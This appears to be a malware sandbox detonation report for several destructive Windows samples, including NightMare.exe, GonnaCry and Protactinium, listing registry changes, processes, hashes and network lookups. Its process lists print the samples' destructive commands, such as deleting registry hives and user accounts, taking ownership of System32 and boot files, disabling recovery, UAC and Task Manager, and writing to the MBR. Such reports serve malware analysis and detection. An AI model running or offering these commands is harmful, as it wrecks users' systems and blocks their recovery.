| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\Help = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\No = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\NWPen = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\SizeAll = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\SizeWE = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\ = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\Wait = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\SizeNESW = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\SizeNS = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\SizeNWSE = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Modifies File Icons
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\4 | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\WOW6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\WOW6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5} | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3045580317-3728985860-206385570-1000\{F40EF9B6-22AB-4520-B606-11D985A58B11} | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\WOW6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\WOW6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\WOW6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B} | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\WOW6432Node\CLSID | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\WOW6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\WOW6432Node | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\NightMare.exe
"C:\Users\Admin\AppData\Local\Temp\NightMare.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k net user %username% /delete && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reg delete HKCR && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reg delete HKU && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reg delete HKLM && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reagentc.exe /disable && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k color 47 && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && Exit
C:\Windows\SysWOW64\net.exe
net user Admin /delete
C:\Windows\SysWOW64\reg.exe
reg delete HKCR
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\ReAgentc.exe
reagentc.exe /disable
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
C:\Windows\SysWOW64\reg.exe
reg delete HKLM
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /delete
C:\Windows\SysWOW64\reg.exe
reg delete HKU
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\taskmgr.exe && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\LogonUI.exe && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\BCD && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\drivers && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\servicing\TrustedInstaller.exe && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\system32\taskmgr.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\System32\WUDFHost.exe && pause
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM fontdrvhost.exe /F
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\system32\LogonUI.exe
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI\BCD
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\system32\drivers
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\System32\WUDFHost.exe
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
Files
memory/32-0-0x0000000000060000-0x0000000000070000-memory.dmp
memory/32-1-0x0000000074DC0000-0x0000000075570000-memory.dmp
memory/32-2-0x00000000050A0000-0x0000000005644000-memory.dmp
memory/32-3-0x0000000004A40000-0x0000000004AD2000-memory.dmp
memory/32-4-0x0000000004B90000-0x0000000004BA0000-memory.dmp
memory/32-5-0x0000000004B10000-0x0000000004B1A000-memory.dmp
C:\Users\Admin\Videos\Captures\desktop.ini
| MD5 | b0d27eaec71f1cd73b015f5ceeb15f9d |
| SHA1 | 62264f8b5c2f5034a1e4143df6e8c787165fbc2f |
| SHA256 | 86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2 |
| SHA512 | 7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE.txt
| MD5 | 21ad42bd4156f914d3a265823a1c269c |
| SHA1 | 4129bc994a0947b38e3bac2aeabc8e2fbdbd503f |
| SHA256 | 680671bac3f22a5f19ffbd2c82eec069a32844cf93d419aa59319cd0cbc98ac2 |
| SHA512 | 7ec8c3801798b4fd547578d31badd96edeaacf0a91dca807c04e40ad65d97592043cb8e747947f74b9850f8e99dcd1c8f1c311cb0f8b79be301be36ca884cc5a |
memory/32-7955-0x0000000074DC0000-0x0000000075570000-memory.dmp
memory/32-10464-0x0000000004B90000-0x0000000004BA0000-memory.dmp
memory/32-120019-0x0000000004B90000-0x0000000004BA0000-memory.dmp
memory/32-120041-0x0000000004B90000-0x0000000004BA0000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
121s
Max time network
124s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\REGFuck.bat"
Network
Files
Analysis: behavioral31
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:15
Platform
win7-20240221-en
Max time kernel
0s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Sulfoxide\Sulfoxide_fixes.exe
"C:\Users\Admin\AppData\Local\Temp\Sulfoxide\Sulfoxide_fixes.exe"
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240215-en
Max time kernel
141s
Max time network
120s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1337\Frog.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1337\Frog.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Roaming\1337\Frog.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2320 wrote to memory of 2552 | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | C:\Users\Admin\AppData\Roaming\1337\Frog.exe |
| PID 2320 wrote to memory of 2552 | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | C:\Users\Admin\AppData\Roaming\1337\Frog.exe |
| PID 2320 wrote to memory of 2552 | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | C:\Users\Admin\AppData\Roaming\1337\Frog.exe |
| PID 2320 wrote to memory of 2552 | N/A | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe | C:\Users\Admin\AppData\Roaming\1337\Frog.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Frog.exe"
C:\Users\Admin\AppData\Roaming\1337\Frog.exe
"C:\Users\Admin\AppData\Roaming\1337\Frog.exe"
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
Network
Files
\Users\Admin\AppData\Local\Temp\nst1383.tmp\System.dll
| MD5 | 2ae993a2ffec0c137eb51c8832691bcb |
| SHA1 | 98e0b37b7c14890f8a599f35678af5e9435906e1 |
| SHA256 | 681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59 |
| SHA512 | 2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9 |
\Users\Admin\AppData\Roaming\1337\Frog.exe
| MD5 | 41e75c80873b0ca18d56ddaba4c5aadd |
| SHA1 | 1d0423d6e66a4739db22939e1c16bcdc7eaa9746 |
| SHA256 | b7d4eef3fa0244a3618b3d60eab9a3ebaf1f8ec5cce9598d37e99b9d7a988cec |
| SHA512 | 402de19c72015fefefe02347fad8907762c991538c4ef7aa6b646c90d6fd7aadadcdb8be9f03d78a1b7cec712516faa318fde738b52dfa7b3aaa34219f2d1530 |
memory/2552-15-0x00000000001C0000-0x00000000001C1000-memory.dmp
C:\Users\Admin\AppData\Roaming\1337\php5ts.dll
| MD5 | c9aff68f6673fae7580527e8c76805b6 |
| SHA1 | bb62cc1db82cfe07a8c08a36446569dfc9c76d10 |
| SHA256 | 9b2c8b8c4cec301c4303f58ca4e8b261d516f10feb24573b092dfccc263baea4 |
| SHA512 | c7836f46e535046562046fdd8d3264cd712a78c0f41eab152c88ea91b17d34f000e2387ded7e9e7b3410332354aabf8ca7d37729eb68e46ab5ce58936e63ac56 |
memory/2552-21-0x0000000003460000-0x0000000003461000-memory.dmp
memory/2584-22-0x0000000002D90000-0x0000000002D91000-memory.dmp
memory/2552-23-0x0000000000400000-0x000000000064F000-memory.dmp
memory/2552-25-0x00000000001C0000-0x00000000001C1000-memory.dmp
memory/2552-26-0x0000000003460000-0x0000000003461000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\GonnaCry.exe
"C:\Users\Admin\AppData\Local\Temp\GonnaCry.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.65.42.20.in-addr.arpa | udp |
Files
memory/3316-0-0x000001C48C460000-0x000001C48C56E000-memory.dmp
memory/3316-1-0x00007FFA7DA20000-0x00007FFA7E4E1000-memory.dmp
memory/3316-2-0x000001C4A6AC0000-0x000001C4A6AD0000-memory.dmp
C:\Users\Admin\Desktop\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE.txt
| MD5 | 7f0df170f9cea3f0bedc79894eb44bdf |
| SHA1 | 79a083f09bf614d80543d0c455bb27b031da8adf |
| SHA256 | 1d9712c98621bfda7f5247f6fd6ef93165db44710685438cf27a3fe5ecc1e738 |
| SHA512 | f3bb9891ae73a4ce45894b30edf753007505d6afce716d1589750721c143e8b483219196d8c6a39d56496e4b7f4b76e64fa85a5c1d000aa0bb9d1224889f9d1c |
memory/3316-1202-0x00007FFA7DA20000-0x00007FFA7E4E1000-memory.dmp
memory/3316-1203-0x000001C4A6AC0000-0x000001C4A6AD0000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\SysWOW64\REG.exe | N/A |
Disables Task Manager via registry modification
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Protactinium (1).exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Protactinium (1).exe |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\REG.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\REG.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\REG.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Protactinium (1).exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Protactinium (1).exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
C:\Windows\SysWOW64\REG.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\REG.exe
REG add HKCU\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f
